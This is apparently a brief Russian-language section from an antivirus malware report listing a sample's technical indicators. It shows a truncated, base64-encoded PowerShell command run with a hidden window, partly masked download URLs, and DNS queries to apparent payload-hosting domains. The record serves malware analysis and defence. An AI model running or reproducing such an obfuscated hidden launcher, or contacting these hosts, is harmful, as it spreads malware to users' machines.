Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABNAHIAdgBxAHYAZgBjAGUAaQBwAHMAbAA9ACcAWABmAHcAcgBwAGYAYwB5AGIAZQBpAG0AJwA7ACQAWAB6AHcAaABoAHAAaABnAHYAYgBmAHoAZQAgAD0AIAAnADMAMgAwACcAOwAkAFYAZgB3AGsAbgB6AG4AegB0AGsAcQB1AHYAPQA...
- http://it###ezle.com/jhq5ds/zBA6DPHN/
- http://www.ri######arfoundation.org/afx/52rs/
- DNS ASK aq###avour.com
- DNS ASK it###ezle.com
- DNS ASK ri######arfoundation.org
- DNS ASK qu###washing.cl
- DNS ASK gu########plot.flywheelsites.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABNAHIAdgBxAHYAZgBjAGUAaQBwAHMAbAA9ACcAWABmAHcAcgBwAGYAYwB5AGIAZQBpAG0AJwA7ACQAWAB6AHcAaABoAHAAaABnAHYAYgBmAHoAZQAgAD0AIAAnADMAMgAwACcAOwAkAFYAZgB3AGsAbgB6AG4AegB0AGsAcQB1AHYAPQA...' (со скрытым окном)